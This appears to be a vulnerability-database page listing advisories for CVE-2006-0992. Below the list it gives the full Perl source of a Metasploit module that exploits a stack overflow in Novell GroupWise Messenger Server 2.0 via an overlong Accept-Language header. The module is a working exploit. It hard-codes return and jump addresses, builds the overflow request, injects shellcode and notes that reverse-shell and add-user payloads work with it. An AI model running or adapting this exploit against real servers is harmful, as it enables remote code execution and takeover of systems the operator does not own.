| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Novell Messenger Server 2.0 (Accept-Language) Remote Overflow Exploit | 15 Apr 200600:00 | – | zdt | |
| CVE-2006-0092 | 5 Jan 200611:03 | – | attackerkb | |
| CVE-2006-0992 | 20 Sep 201000:00 | – | circl | |
| Novell GroupWise Messenger Accept-Language Header Buffer Overflow (CVE-2006-0992) | 27 Oct 200900:00 | – | checkpoint_advisories | |
| CVE-2006-0992 | 14 Apr 200610:00 | – | cve | |
| CVE-2006-0992 | 14 Apr 200610:00 | – | cvelist | |
| Novell Messenger Server 2.0 - Accept-Language Overflow (Metasploit) | 20 Sep 201000:00 | – | exploitdb | |
| Novell Messenger Server 2.0 - Accept-Language Remote Overflow (Metasploit) | 15 Apr 200600:00 | – | exploitpack | |
| Immunity Canvas: GROUPWISE_MESSENGER | 14 Apr 200610:02 | – | canvas | |
| Novell Messenger Server 2.0 Accept-Language Overflow | 14 Apr 200620:22 | – | metasploit |
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::novell_messenger_acceptlang;
use strict;
use base "Msf::Exploit";
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Novell Messenger Server 2.0 Accept-Language Overflow',
'Version' => '$Revision: 1.5 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'winxp', 'win2k', 'win2003' ],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8300 ],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x2c\x3b".join("", ("A".."Z")), # data is downcased
'Keys' => ['+ws2ord'],
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in Novell GroupWise
Messenger Server v2.0. This flaw is triggered by any HTTP
request with an Accept-Language header greater than 16 bytes.
To overwrite the return address on the stack, we must first
pass a memcpy() operation that uses pointers we supply. Due to the
large list of restricted characters and the limitations of the current
encoder modules, very few payloads are usable. The 'known good' set
includes win32_adduser, win32_exec, and win32_reverse_ord;
}),
'Refs' =>
[
['OSVDB', '24617'],
['BID', '17503'],
['CVE', '2006-0992'],
],
'Targets' =>
[
[ 'Groupwise Messenger DClient.dll v10510.37', 0x6103c3d3, 0x61041001 ] # .data | jmp esp
],
'Keys' => ['groupwise'],
'DisclosureDate' => 'Apr 13 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}
my $pattern = Pex::Text::AlphaNumText(1900);
substr($pattern, 16, 4, pack('V', $target->[2])); # SRC
substr($pattern, 272, 4, pack('V', $target->[2])); # DST
substr($pattern, 264, 4, pack('V', $target->[1])); # JMP ESP
substr($pattern, 268, 2, "\xeb\x06"); # JMP +6
substr($pattern, 276, length($shellcode), $shellcode);
my $request =
"GET / HTTP/1.1\r\n".
"Accept-Language: $pattern\r\n".
"\r\n";
$s->Send($request);
$self->PrintLine("[*] Overflow request sent...");
$self->Handler($s);
return;
}
1;
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